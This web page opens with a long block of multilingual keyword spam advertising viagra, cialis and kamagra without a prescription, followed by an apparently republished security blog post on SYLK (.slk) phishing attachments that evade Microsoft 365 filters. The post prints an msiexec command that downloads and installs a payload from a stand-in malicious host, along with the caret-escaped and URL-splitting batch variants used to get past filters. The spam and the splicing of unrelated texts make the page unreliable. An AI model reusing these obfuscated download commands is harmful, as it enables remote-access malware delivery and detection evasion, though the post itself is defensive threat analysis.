kvinder og viagra beställ kamagra priligy generika dapoxetine 60mg kamagra oral jelly kvinder köpa viagra 50 mg indische generika cialis cialis patentti hinta viagra for kvinner kjøp viagra vrouwen kopen etos andel af mænd tager viagra kamagra kopen in middelburg cialis preisvergleich apotheken potenzmittel kamagra bestellen cialis online bestellen paypal köpa viagra med bitcoin cialis generika online kaufen ohne rezept köpa viagra sverige köpa kamagra jelly snabb leverans wat kost cialis 2 5 mg viagra kjøp på nett naturligt viagra apoteket cialis hinta viron apteekissa goedkope viagra online bestellen viagra köpes viagra hur många piller viagra bestellen 2018 kamagra potenzmittel apotheke viagra med resept viagra för män online viagra reseptin saaminen køb billig viagra viagra för män hur länge har rezeptfrei viagra ersatz viagra pris 100 mg receptfritt som viagra hvordan virket viagra viagra pills wont work cialis 20mg lilly rezeptfrei cialis 40 pris hva koster viagra på resept super kamagra apotheke kamagra bestellen ideal kvinnor vad tycker ni om viagra viagra boys norge säkert att köpa viagra på nätet ervaringen kamagra kopen 2018 viagra kopen met ideal seisoo paremmin ilman viagraa beställa viagra express discreet viagra bestellen kamagra pills india viagra gele.till.kvinnor viagra priser i norge old viagra tablets cialis 10mg rezeptfrei kaufen cialis online kopen nederland viagra uten resept italia köpa viagra klarna cialis erectiepil bestellen nl br gratis viagra piller viagra soft på apotek 365 i sverige viagra pris thailand cialis ohne rezept apotheke spanien apotheke cialis køb viagra sverige køb viagra hurtig levering viagra kopen arnhem viagra priser i danmark cialis kopen bij kruidvat köp viagra online sverige cialis 5mg rezeptfrei cialis norge forum wat kost een viagra pil bij de apotheek priligy kosten køb cialis super active eu lande viagra piller kjøpe viagra lovlig på nett viagra online pris cialis apotheke ohne rezept kamagra online sverige mitä tekee jos ottaa liikaa viagraa pris cialis apoteket köpa levitra beställa kamagra flashback kan ik kamagra bij de apotheek kopen viagra bestellen ohne rezept deutschland viagra rezeptfrei europa viagra in engeland bestellen saako norjasta viagraa viagra til mænd bivirkninger propecia kopen nederland afhalen viagra piller grønne orginele kamagra bestellen kamagra apotheke online direktköp av viagra i stockholm apua potenssiongelmiin ilman viagraa waar kan ik veilig cialis kopen köpa kvinnlig viagra kamagra jelly kvinnor viagra receptfritt cypern citodon viagra biverkningar viagra gel kopen waar kan ik super kamagra bestellen jag vill köpa cialis köpa viagra olagligt propecia rezeptfrei bestellen cialis hinta 5mg prijs van viagra bij apotheek cialis hinta espanja kamagra in apotheke kaufen wien virker viagra piller til mænd også på kvinder köpa kamagra medicin levitra piller pillsbank de rezeptfrei viagra kaufen kuinka usein viagra reseptin voi uusia lady viagra pills kamagra deutschland bestellen rezeptfrei kamagra kopen groningen købe viagra anonymt viagra kvinnor effekt waar kun je viagra kopen köpa generisk viagra viagra rezeptfrei online köpa kamagra online kamagra 100mg günstig bestellen kamagra kopen betrouwbaar cialis bestellen deutschland kopen kamagra review pris kamagra gel hvordan er sex på levitra viagra sverige flashback yliopiston apteekki viagra ilman reseptiä kopen cialis dokteronline cialis bestellen belgie viagra 200mg pris funkar viagra för kvinnor erfahrungen viagra übers internet bestellen levitra 20 ng apoteket hjärtat pris kamagra te koop den haag anti viagra pills köpa viagra på svensk porrafär kamagra brausetabletten rezeptfrei kaufen viagra sverige apotek kamagra sverige propecia köpa online viagra piller virkning köpa viagra 2019 priligy online apotheke viagra uten resept kroatia är viagra receptfritt på apoteket cialis 40mg kopen finasteride propecia kopen is het veilig om in turkije viagra te kopen viagra generika erfahrungsberichte kjøpe viagra reseptfritt viagra voor vrouw en man te koop propecia ilman reseptiä receptfritt kamagra meddirekt24 viagra generika rezeptfrei kaufen affär i stockholm som säljer direkt omgående viagra cialis weekend pill viagra køb danmark kamagra kopen aken cialis i sverige cialis 60 mg sverige køb viagra midtjylland uden recept køb af viagra på apoteket viagra generika kaufen ohne kreditkarte kamagra apotheke preis how long does a viagra pill last billig kamagra bestellen viagra generika kaufen ohne rezept viagra hinnat canaria alternative piller til viagra waar kan je cialis kopen kamagra günstig bestellen per nachnahme cialis pris apoteket kronan seriöse online apotheke für viagra köpa viagra online se köpa kamagra sverige flashback flashback köpa kamagra køb cialis super active europe waar koop je veilig viagra generisk cialis norge cialis köpa flashback erfaring med køb af viagra på nettet female viagra pink pill side effects köpa viagra i thailand köpa generisk viagra online cialis 20 mg pris apotek sildenafil kvinnlig viagra cialis generika online apotheke cialis potenzmittel rezeptfrei viagra bestellen duitsland viagra kopen bij kruidvat viagra 25 mg pris köp viagra med faktura køb viagra i eu er cialis lovlig i norge alternative viagra pills cialis styrka och pris apoteket saako viagran myymisestä h-merkkinän cialis kamagra kopen waar koop je echte viagra cialis generika sverige viagra online apotheke österreich viagra pillen kopen online cialis original sverige preise viagra deutschen apotheken viagra 100mg priser viagra 100 mg pris apoteket er det ulovlig å kjøpe viagra på nett viagra fra danmark viagra pris recept kosten levitra 20mg cialis 20mg preis apotheke echte viagra pfizer kopen marktplaats cialis usa rezeptfrei kjøpe kamagra i thailand hvad sker der hvis kvinder tager viagra saako viagra reseptin helposti viagra kaufen schweiz apotheke saako viagraa apteekist viagra per paypal bestellen pris viagra apoteket køb viagra receptfri uden recept var kan man köpa kamagra säkert viagra for menn pris cialis daily pris super kamagra bestellen belgie levitra på nätet viagra kaufen apotheke basel orgasm viagra kvinnor goedkoopste kamagra bestellen viagra pil waar te koop cialis hinta 2017 kjøp priligy online apotheke viagra rezeptfrei cialis kvinnor kamagra kopen zaandam viagra flashback köpa ist viagra rezeptfrei kamagra pris flashback receptfritt cialis pink viagra bestellen bästa pris viagra kjøp cialis norge naturlig viagra til kvinder generisk propecia danmark hvad er kvindelige viagra til hvor kan kjøpe cialis hur skaffar man viagra sverig 1 viagra bestellen viagra pil voor vrouwen bestellen cialis kaufen rezeptfrei deutschland kamagra apotheek nederland cialis 5mg 84 stück generika viagra creme til kvinder viagra pris apotek sverige viagra kaufen rezeptfrei deutschland apotheke viagra pill apoteket cialis nederland bestellen receptfritt viagra tyskland viagra pille 10000 turkse viagra bestellen hvor mange mg viagra skal jeg købe veilig kamagra bestellen forum finns det receptfritt viagra wie teuer ist viagra in der apotheke levitra generika günstig viagra in kroatien rezeptfrei kaufen cialis online bestellen belgie waar koop ik echte viagra generieke propecia kopen viagra sverige apotek viagra biverkningar hjärta viagra priser sverige viagra europa rezeptfrei köpa viagra online virker viagra til mænd på kvinder er det muligt og købe viagra uden recept fourm levitra preisvergleich apotheke viagra receptfritt norge viagra ilman reseptiä apteekista erectie shop nl kamagra kopen viagra kopen bestellen priligy online sverige viagra generika preise deutschland viagra pfizer online bestellen kamagra oral jelly kopen in rotterdam kamagra 100 kopen kamagra 100mg rezeptfrei bestellen viagra i apotek super kamagra günstig bestellen kamagra kopen winkel cialis 5 mg pris apoteket cialis kopen met ideal apotek cialis pris cialis kopen zonder recept in nederland viagra kopimedicin pris kamagra køb review kamagra bestellen shop generisk viagra erfaringer kan man kjøpe viagra i bulgaria uten resept vloeibare kamagra kopen cialis generiek kopen kamagra online kopen kamagra 100mg kopen propecia 1 8 of a pill viagra kopen apotheek belgie viagra resepti nettilääkäri köp kamagra snabb leverans kamagra oral jelly kopen nederland hva koster viagra i sverige viagra kopen in belgie apotheek leather toys kamagra bestellen köpa äkta viagra på nätet bestellen-kamagra.nl contact köpa viagra cialis apotek sverige vrouw viagra kopen kamagra kopen in de winkel groningen cialis pris apoteket hjärtat viagra uten resept i hellas viagra vrouw bestellen cialis 5mg bestellen viagra bestellen ohne rezept erfahrungen waar in amsterdam kamagra te koop priser på levitra apotekenes sjekkliste for viagra cialis pillen bestellen kamagra günstig bestellen paypal cialis pill er viagra på resept i tyrkia viagra generika aus deutschland viagra priser i tyskland male viagra pill kjøpe viagra i pattaya viagra generika bestellen viagra apotheke cialis prijs apotheek mediq online viagra apotek norge kamagra jelly bestellen belgie rejsningsproblemer pga ryggen køb viagra köp viagra för man ska hålla på länge what happens if a girl takes viagra pills kan je kamagra jelly kopen in een sexshop gratis kamagra bestellen kan je in duitsland viagra kopen erektiohäiriö ilman viagraa köpa kamagra i sverige priligy rezeptfrei cialis 2.5 mg apteekissa viagra resepti lääkäriltä viagra testosteron lybido för kvinnor viagra voor vrouwen kopen kruidvat hvad sker fer hvis man taget 2 viagra piller 50 mg viagra kopen met ideal köpa kamagra stockholm spanien apotheke rezeptfrei viagra cialis generika ohne zollprobleme kaufen liquid cialis vs pill cialis generika in deutschland kaufen viagra netistä ilman reseptiä viagra online bestellen beoordeling pris cialis apoteket propecia kopen female viagra kopen viagra kaufen holland apotheke kamagra kopen india viagra receptfritt i vilka länder cialis generika rezeptfreie kaufen horse viagra pill cialis preis apotheke österreich viagra hinta tallinna kamagra oral jelly waar te koop priligy kopen belgie viagra kopen nijmegen bekommt man viagra in der apotheke ohne rezept was kostet kamagra in der apotheke viagra kopen aanbieding viagra generika vergleich cialis kopen morgen in huis online apotheke niederlande cialis kamagra kopen in sexshop cialis generika ohne rezept bestellen köpa viagra med swish viagra på nett norge kamagra bestellen per nachnahme daglig cialis norge kamagra bestellen vandaag in huis kamagra kopen in spanje viagra vrij te koop in spanje online apotheke cialis 5mg kan ik viagra kopen zonder voorschrift viagra hungary apteekki kamagras kopen wo gibt es viagra rezeptfrei viagra pillen kopen originele kan je viagra kopen viagra kan købes i spanien cialis tab 20 mg pris kamagra online apotheke seriös køb viagra i spanien cialis via apotheek viagra kvinnor yellowstone kamagra kopen drogist beställ kamagra jelly hvor køber man viagra i polen blue pill viagra dosage köpa viagra flashback 2019 viagra bestellen ohne rezept günstig cialis generika wirkungsdauer levitra generika preis ervaringen online viagra bestellen veilig cialis kopen vilken påverkan har viagra på kvinnor kamagra pills or jelly viagra ersatz rezeptfrei kaufen viagran käytön jälkeen mustelma rezeptfrei viagra kaufen 24 hvad koster viagra nu cobra kamagra bestellen waar viagra kopen zonder recept viagra pris norge ervaring kopen bij kamagra-advies.nl cialis pris dk köpa kamagra 100mg kamagra te koop almere cialis kaufen apotheke pfizer viagra køb viagra kosten aftrekbaar cialis pris se viagra kopen etos viagra in sexshop kopen viagra pill for women treadent viagra apotheek duitseland kamagra bestellen 2019 kamagra bestellen pakje gemak köpa viagra online sverige flashback tilaa viagraa suomesta viagra hinta venäjällä cialis 20mg online apotheke cialis generika rezeptfrei schweiz køb kamagra uden recept viagra för äldre män buy viagra danmark propecia kosten kan je of kun je kamagra in een sexshop kopen køb viagra connect female viagra norge kamagra pillen kopen kruidvat köpa viagra straff køb viagra aalborg viagra malmln apteekki 12kpl viagra günstig online bestellen cialis korvike hinta cialis 20mg rezeptfrei kaufen https www.bestellen-kamagra.nl bestel-geschiedenis kan man kjøpe levitra uten resept i spania cialis tadalafil 20 mg kopen levitra 20mg pris viagra priser sverige vart kan man köpa viagra flashback kvinnelig viagra kjøp hvor stor andel af mænd tager viagra viagran käyttö naisella cialis 5mg apotheke preis viagra apotheek antwerpen kamagra stockholm waar koop je viagra levitra kvinnor köpa viagra receptfritt utan recept kamagra oral jelly 100mg bestellen kamagra bestellen belgië viagra pris 2019 generiek cialis kopen cialis pris apotea kamagra vandaag bestellen morgen in huis praag viagra kopen kamagra kopen nl veilig pris viagra på recept köpa viagra för tjejer på faktura koop viagra nye priser på viagra waar is viagra vrij te koop cialis 10 mg pris goedkoop kamagra bestellen aanbieding viagra frei in der apotheke hvis kvinder tager viagra viagra resepti män viagra tabletter köpa apotekets priser på viagra köpa kamagra brustablett köpa viagra apoteket buy cialis 36 hour pill kamagra telefonisch bestellen super kamagra bestellen deutschland potenssilääke cialis hinta apteekki cialis 2 5
200M+ Users At Risk: New Malicious .slk Files Are Bypassing Microsoft 365 Security

200M+ Users At Risk: New Malicious .slk Files Are Bypassing Microsoft 365 Security


Avanan’s security analysts have detected new malicious .slk files bypassing Microsoft 365 security, risking 200M+ users. In this attack, hackers send an email with an .slk attachment that contains a malicious macro (MSI exec script) to download and install a remote access trojan. The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations. This has changed. Please find below the attack details.

SYLKin Attack: New Malicious .slk files are bypassing Microsoft 365 Security, Risking 200M+ UsersShare

A new attack method bypasses both Microsoft 365 default security (EOP) and advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable and the attack is still being used extensively against Microsoft 365 customers.

This week, Avanan’s Security Analysts detected a significant increase in the usage of .slk files in attacks against Microsoft 365 customers. In this attack, hackers send an email with an .slk attachment that contains a malicious macro (MSI exec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. More details below.

Gmail customers are safe from this attack – Google blocks it on incoming email and makes it impossible to send them as an attachment from a Gmail account.

What should I do?

If you are an Avanan customer and in Protect (Inline) mode, this attack is blocked and users will not see them in their inbox. If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap. Microsoft’s recommendations are much more complicated, but are another alternative to protect the desktop.

About the Attack

SLK files are rare. If you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Advanced Threat Protection. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations. This has changed.

Emails are Targeted and Manually Created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacture will discuss parts specifications, an email to a tech firm ask for changes to a large electronics order while an email to a government department will discuss legal concerns. The subjects, contents, and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is an SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update when Dallas went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end-user, an SLK file looks like an Excel document. For the attacker, it is an easy way to bypass Microsoft 365 security, even for accounts protected with Advanced Threat Protection.

David Williams of V&C Inc.slk

What does this attack do?

This week’s version of the SYLK attack includes an SLK file with an obfuscated macro to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it is a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows Grants More Trust to SLK Files than XLSX Files

Because Windows “Protected View” does apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end-user does not see this message:

Targeted Methodology to bypass Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft Advanced Threat Protection (ATP). This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass ATP.

  • The attack was sent from hundreds of free Hotmail accounts
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link,
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure.

The attack was sent from thousands of Hotmail accounts.

All of the emails were sent from disposable email addresses of the format “randomwords1982@hotmail.com”, each sending just a handful of messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret the text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the tell-tale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear’, running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link, and would normally catch any text of the format malicious-site.com. In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JBfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

set /p=””e.com/install.php ^/q”” >> JBfoT.bat & JBfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.

The hosting server was armed after the message was sent

We don’t believe ATP is testing these files within their sandbox environment, relying on static filters, but we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider as “the reported content is no longer available at the links associated with” the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails suggests a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-then-off-again timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User-Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

Why Wasn’t it Caught?

Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, requiring each file to be given additional scrutiny.



2020-06-26 07:00:00

Leave a Reply

Your email address will not be published. Required fields are marked *